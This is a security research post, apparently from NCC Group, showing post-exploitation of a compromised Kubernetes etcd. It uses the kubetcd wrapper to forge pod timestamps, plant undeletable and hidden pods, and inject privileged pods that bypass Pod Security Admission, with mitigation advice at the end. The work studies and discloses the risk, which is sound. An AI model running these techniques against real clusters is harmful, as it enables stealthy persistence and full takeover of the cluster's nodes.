Post-exploiting a compromised etcd – Full control over the cluster and its nodes

7 November 2023 at 08:00

Kubernetes is essentially a framework of various services that make up its typical architecture, which can be divided into two roles: the control-plane, which serves as a central control hub and hosts most of the components, and the nodes or workers, where containers and their respective workloads are executed.

Within the control plane we typically find the following components:

kube-apiserver: This component acts as the brain of the cluster, handling requests from clients (such as kubectl) and coordinating with other components to ensure their proper functioning.
scheduler: Responsible for determining the appropriate node to deploy a given pod to.
control manager: Manages the status of nodes, jobs or service accounts.
etcd: A key-value store that stores all cluster-related data.

Inside the nodes we typically find:

kubelet: An agent running on each node, responsible for keeping the pods running and in a healthy state.
kube-proxy: Exposes services running on pods to the network.

When considering the attack surface in Kubernetes, we consider certain unauthenticated components, such as the kube-apiserver and kubelet, as well as leaked tokens or credentials that grant access to certain cluster features, and non-hardened containers that may provide access to the underlying host. However, when discussing etcd, it is often perceived solely as an information storage element within the cluster from which secrets can be extracted. However, etcd is much more than that.

What is etcd and how it works?

Etcd, which is an external project to the core of Kubernetes, is a non-relational key-value database that stores all the information about the cluster, including pods, deployments, network policies, roles, and more. In fact, when performing a cluster backup, what is actually done is a dump of etcd, and during a restore operation, this is also done through this component. Given its critical role in the Kubernetes architecture, can’t we use it for more than just extracting secrets?

Its function as a key-value database is straightforward. Entries can be added or edited using the put command, the value of keys can be retrieved using get, deletions can be performed using delete, and a directory tree structure can be created:

$ etcdctl put /key1 value1
OK
$ etcdctl put /folder1/key1 value2
OK
$ etcdctl get / --prefix --keys-only
/folder1/key1
/key1
$ etcdctl get /folder1/key1
/folder1/key1
value2

How kubernetes uses etcd: Protobuf

While the operation of etcd is relatively straightforward, let’s take a look at how Kubernetes injects its resources into the database, such as a pod. Let’s create a pod and extract its entry from etcd:

$ kubectl run nginx --image nginx
pod/nginx created
$ kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          20s*
$ ETCDCTL_API=3 etcdctl --endpoints 127.0.0.1:2379 --cert=/etc/kubernetes/pki/etcd/server.crt --key=/etc/kubernetes/pki/etcd/server.key --cacert=/etc/kubernetes/pki/etcd/ca.crt get /registry/pods/default/nginx
/registry/pods/default/nginx
k8s

v1Pod�
�

nginx▒default"*$920c8c37-3295-4e66-ad4b-7b3ad57f2c192�퇣Z

runnginxbe
!cni.projectcalico.org/containerID@545434f9686cc9ef02b4dd16f6ddf13a89e819c25a30ed7c103a4ab8a86d7703b/
ni.projectcalico.org/podIP10.96.110.138/32b0
cni.projectcalico.org/podIPs10.96.110.138/32��
calicoUpdate▒v�퇣FieldsV1:�
�{"f:metadata":{"f:annotations":{".":{},"f:cni.projectcalico.org/containerID":{},"f:cni.projectcalico.org/podIP":{},"f:cni.projectcalico.org/podIPs":{}}}}Bstatus��

kubectl-runUpdate▒v�퇣FieldsV1:�
�{"f:metadata":{"f:labels":{".":{},"f:run":{}}},"f:spec":{"f:containers":{"k:{\\"name\\":\\"nginx\\"}":{".":{},"f:image":{},"f:imagePullPolicy":{},"f:name":{},"f:resources":{},"f:terminationMessagePath":{},"f:terminationMessagePolicy":{}}},"f:dnsPolicy":{},"f:enableServiceLinks":{},"f:restartPolicy":{},"f:schedulerName":{},"f:securityContext":{},"f:terminationGracePeriodSeconds":{}}}B��
kubeletUpdate▒v�퇣FieldsV1:�
�{"f:status":{"f:conditions":{"k:{\\"type\\":\\"ContainersReady\\"}":{".":{},"f:lastProbeTime":{},"f:lastTransitionTime":{},"f:status":{},"f:type":{}},"k:{\\"type\\":\\"Initialized\\"}":{".":{},"f:lastProbeTime":{},"f:lastTransitionTime":{},"f:status":{},"f:type":{}},"k:{\\"type\\":\\"Ready\\"}":{".":{},"f:lastProbeTime":{},"f:lastTransitionTime":{},"f:status":{},"f:type":{}}},"f:containerStatuses":{},"f:hostIP":{},"f:phase":{},"f:podIP":{},"f:podIPs":{".":{},"k:{\\"ip\\":\\"10.96.110.138\\"}":{".":{},"f:ip":{}}},"f:startTime":{}}}Bstatus�
�
kube-api-access-b9xkqk�h
"

�▒token
(▒ 

kube-root-ca.crt
ca.crtca.crt
)'
%
        namespace▒
v1metadata.namespace��
nginxnginx*BJL
kube-api-access-b9xkq▒-/var/run/secrets/kubernetes.io/serviceaccount"2j/dev/termination-logrAlways����File▒Always 2
                                                                                                                   ClusterFirstBdefaultJdefaultR
                                                                                                                                                kind-worker2X`hr���default-scheduler�6
node.kubernetes.io/not-readyExists▒"    NoExecute(��8
node.kubernetes.io/unreachableExists▒"  NoExecute(�����PreemptLowerPriority▒�
Running#

InitializedTrue�퇣*2
ReadyTrue�퇣*2'
ContainersReadyTrue�퇣*2$

PodScheduledTrue�퇣*2▒"*
10.96.110.13�퇣B�
nginx

�퇣▒ (2docker.io/library/nginx:latest:_docker.io/library/nginx@sha256:480868e8c8c797794257e2abd88d0f9a8809b2fe956cbfbc05dcc0bca1f7cd43BMcontainerd://dbe056bb7be0dfb74a3f8dc6bd75441fe9625d2c56bd5fcd988b780b8cb6884eHJ
BestEffortZb
10.96.110.138▒"

As you can see, the data extracted from the pod in etcd is not just alphanumeric characters. This is because Kubernetes serialises the data using protobuf.

Protobuf, short for Protocol Buffers, is a data serialisation format developed by Google that is independent of programming languages. It enables efficient communication and data exchange between different systems. Protobuf uses a schema or protocol definition to define the structure of the serialised data. This schema is defined using a simple language called the Protocol Buffer Language.

For example, let’s consider a protobuf message to represent data about a person. We would define the structure of the protobuf message as follows:

syntax = "proto3";

message Person {
  string name = 1;
  int32 age = 2;
  string email = 3;
}

If we wanted to serialise other types of data, such as car or book data, the parameters required to define them would be different to those required to define a person. The same principle is true for Kubernetes. In Kubernetes, multiple resources can be defined, such as pods, roles, network policies, and namespaces, among others. While they share a common structure, not all of them can be serialised in the same way, as they require different parameters and definitions. Therefore, different schemas are required to serialise these different objects.

Fortunately, there is auger, an application developed by Joe Betz, a technical staff member at Google. Auger collects the Kubernetes source code and all the schemas, allowing the serialisation and deserialisation of data stored in etcd into YAML and JSON formats. At NCC Group, we have created a wrapper for auger called kubetcd to demonstrate the potential criticality of a compromised etcd through a proof of concept (PoC).

Limitations

As a post-exploitation technique, this approach has several limitations. The first and most obvious is that we would need to have compromised the host running the etcd service as root. This is necessary because we need access to the following certificates in order to authenticate to the etcd service, which are typically only exposed on localhost. The default paths used by most installation scripts are:

/etc/kubernetes/pki/etcd/ca.crt
/etc/kubernetes/pki/etcd/server.crt
/etc/kubernetes/pki/etcd/server.key (this is only readable by root)

A second limitation is that we would need to have the desired items already present in the cluster in order to use them as templates, especially for those that execute, such as pods. This is necessary because there is execution metadata that is added once the build request has passed through the kube-apiserver, and occasionally there is third-party data (e.g. Calico) that is not typically included in a raw manifest.

The third and final limitation is that this technique is only applicable to self-managed environments, which can include on-premises or virtual instances in the cloud. Cloud providers that offer managed Kubernetes are responsible for managing and securing the control plane, which means that access to not only etcd but also the scheduler or control manager is restricted and users cannot interact with them. Therefore, this technique is not suitable for managed environments.

Injecting resources and tampering data

Recognising that data entry is done through serialisation with protobuf using different schemas, the kubetcd wrapper aims to emulate the typical syntax of the native kubectl client. However, when interacting directly with etcd, many fields that are managed by the logic of the kube-apiserver can be modified without restriction. A simple example would be the timestamp, which indicates the creation date and time of a pod:

root@kind-control-plane:/# kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          38s
root@kind-control-plane:/# kubetcd create pod nginx -t nginx --time 2000-01-31T00:00:00Z
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/default/nginx
OK
root@kind-control-plane:/# kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          23y

Changing the timestamp of a newly created Pod would help to make it appear, beyond what is shown in the event logs, as if it had been running in the cluster for a certain period of time. This could give any administrator pause as to whether it would be appropriate to delete it or whether it would affect any services.

Persistence

Now that we know we can tamper with the startup date of a pod, we can explore modifying other parameters, such as changing the path in etcd to gain persistence in the cluster. When we create a pod named X, it is injected into etcd at the path /registry/pods/<namespace>/X. However, with direct access to etcd, we can make the pod name and its path in the database not match, which will prevent it from being deleted by the kube-apiserver:

root@kind-control-plane:/# kubetcd create pod nginxpersistent -t nginx -p randomentry
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/default/randomentry
OK
root@kind-control-plane:/# kubectl get pods
NAME              READY   STATUS    RESTARTS   AGE
nginx             1/1     Running   0          23y
nginxpersistent   1/1     Running   0          23y
root@kind-control-plane:/# kubectl delete pod nginxpersistent
Error from server (NotFound): pods "nginxpersistent" not found

Taking this a step further, it is possible to create inconsistencies in pods by manipulating not only the pod name, but also the namespace. By running pods in a namespace that does not match the entry in etcd, we can make them semi-hidden and difficult to identify or manage effectively:

root@kind-control-plane:/# kubetcd create pod nginx_hidden -t nginx -n invisible --fake-ns
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/invisible/nginx_hidden
OK

Note that with --fake-ns, the invisible namespace is only used for the etcd injection path, but the default namespace has not been replaced in its manifest. Because of this inconsistency, the pod will not appear when listing the default namespace, and the invisible namespace will not be indexed. This pod will only appear when all resources are listed using --all or -A:

root@kind-control-plane:/# kubectl get pods
NAME              READY   STATUS    RESTARTS   AGE
nginx             1/1     Running   0          23y
nginxpersistent   1/1     Running   0          23y
root@kind-control-plane:/# kubectl get namespaces
NAME                 STATUS   AGE
default              Active   13m
kube-node-lease      Active   13m
kube-public          Active   13m
kube-system          Active   13m
local-path-storage   Active   13m
root@kind-control-plane:/# kubectl get pods -A | grep hidden
default              nginx_hidden  1/1     Running   0   23y

By manipulating the namespace entry in etcd, we can create pods that appear to run in one namespace, but are actually associated with a different namespace defined in their manifest. This can cause confusion and make it difficult for administrators to accurately track and manage pods within the cluster.

These are just a few basic examples of directly modifying data in etcd, specifically in relation to pods. However, the possibilities and combinations of these techniques can lead to other interesting scenarios.

Bypassing AdmissionControllers

Kubernetes includes several elements for cluster hardening, specifically for pods and their containers. The most notable elements are:

SecurityContext, which allows, among other things, preventing a pod from running as root, mounting filesystems in read-only mode, or blocking capabilities.
Seccomp, which is applied at the node level and restricts or enables certain syscalls.
AppArmor, which provides more granular syscall management than Seccomp.

However, all of these hardening features may require policies to enforce their use, and this is where Admission Controllers come into play. There are several types of built-in admission controllers, and custom ones can also be created, known as webhook admission controllers. Whether built-in or webhook, they can be of two types:

Validation: They accept or deny the deployment of a resource based on the defined policy. For example, the NamespaceExist Admission Controller denies the creation of a resource if the specified namespace does not exist.
Mutation: These modify the resource and the cluster to allow its deployment. For example, the NamespaceAutoProvision Admission Controller checks resource requests to be deployed in a namespace and creates the namespace if it does not exist.

There is a built-in validation type Admission Controller that enforces the deployment of hardened pods, known as the Pod Security Admission (PSA). This Admission Controller supports three predefined levels of security, known as the Pod Security Standard, which are detailed in the official Kubernetes documentation. In summary, they are as follows:

Privileged: No restrictions. This policy would allow you to have all permissions to perform a pod breakout.
Baseline: This policy applies a minimum set of hardening rules, such as restricting the use of host-shared namespaces, using AppArmor, or allowing only a subset of capabilities.
Restricted: This is the most restrictive policy and applies almost all available hardening options.

PSAs replace the obsolete Pod Security Policies (PSP) and are applied at the namespace level, so all pods deployed in a namespace where these policies are defined are subject to the configured pod security standard.

It is worth noting that these PSAs apply equally to all roles, so even a cluster admin could not circumvent these restrictions unless they regenerated the namespace by disabling these policies:

root@kind-control-plane:/# kubectl get ns restricted-ns -o yaml
apiVersion: v1
kind: Namespace
metadata:
  creationTimestamp: "2023-05-23T10:20:22Z"
  labels:
    kubernetes.io/metadata.name: restricted-ns
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/warn: restricted
  name: restricted-ns
  resourceVersion: "3710"
  uid: 2277ebac-e487-4d59-8a09-97bef27cc0d9
spec:
  finalizers:
  - kubernetes
status:
  phase: Active

root@kind-control-plane:/# kubectl run nginx --image nginx -n restricted-ns
Error from server (Forbidden): pods "nginx" is forbidden: violates PodSecurity "restricted:latest": allowPrivilegeEscalation != false (container "nginx" must set securityContext.allowPrivilegeEscalation=false), unrestricted capabilities (container "nginx" must set securityContext.capabilities.drop=["ALL"]), runAsNonRoot != true (pod or container "nginx" must set securityContext.runAsNonRoot=true), seccompProfile (pod or container "nginx" must set securityContext.seccompProfile.type to "RuntimeDefault" or "Localhost")

As expected, not even a cluster administrator is allowed to deploy a pod without meeting all the security requirements imposed by the PSA. However, it is possible to inject privileged pods into namespaces restricted by PSAs using etcd:

root@kind-control-plane:/# kubetcd create pod nginx_privileged -t nginx -n restricted-ns -P
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Privileged SecurityContext Added
Path injected: /registry/pods/restricted-ns/nginx_privileged
OK
root@kind-control-plane:/# kubectl get pods -n restricted-ns
NAME               READY   STATUS    RESTARTS   AGE
nginx_privileged   1/1     Running   0          23y
root@kind-control-plane:/# kubectl get pod nginx_privileged -n restricted-ns -o yaml | grep "restricted\\|privileged:"
    namespace: restricted-ns
        privileged: true

Being able to deploy unrestricted privileged pods it would be easy to get a shell on the underlying node. This demonstrates that gaining write access to an etcd node, whether deployed as a pod within the cluster, as a local service in the control plane or as an isolated node as part of an etcd cluster, could compromise the kubernetes cluster and all its underlying infrastructure.

Why this works?

When working with the regular client, kubectl, it sends all requests directly to the kube-apiserver, where processes are executed in the following order: authentication, authorisation and Admission Controllers. Once the request has been authenticated, authorised and filtered through the admission controllers, the kube-apiserver redirects the request to the other components of the cluster to organise the provisioning of the desired resource. In other words, the kube-apiserver is not only the entry point to the cluster, but also applies all the controls for accessing it.

However, by injecting these resources directly into etcd, we bypass all these controls because the request does not go from the client to the kube-apiserver, but from the database in the backend where the cluster elements are stored. As the current architecture of Kubernetes is designed, it places trust in etcd, assuming that if an element is already in the database, it has already passed all the controls imposed by the kube-apiserver.

Mitigating the threat

Despite the capabilities of this post-exploitation technique, it would be easily detectable, especially if we seek to obtain shells on the nodes, mainly by third-party runtime security solutions with good log ingest times, such as Falco or some EDRs, which run at the node level.

However, as already demonstrated, gaining access to the nodes would be a simple task, and since most container engines run as root by default, and with the user namespace disabled, we would get a direct shell as root in most cases. This would allow us to manipulate host services and processes, be they EDRs or agents for sending logs. Enabling user namespace, using container sandboxing technologies or setting the container engine to rootless mode could help mitigate this attack vector.

Conclusions

The state-of-the-art regarding the attack surface in a Kubernetes cluster has been defined for some time, focusing on elements such as unauthenticated kube-apiserver or kubelet services, leaked tokens or credentials, and various pod breakout techniques. Most of the techniques described so far in relation to etcd have focused primarily on the extraction of secrets and the lack of encryption of data at rest.

This paper aims to demonstrate that a compromised etcd is the most critical element within the cluster, as it is not subject to role restrictions or the AdmissionControllers. This makes it easy to compromise not only the cluster itself, but also its underlying infrastructure, including all the nodes on which a kubelet is deployed.

This should make us rethink the implementation of etcd and its reliability within the cluster by implementing additional mechanisms that ensure data integrity.

Normal view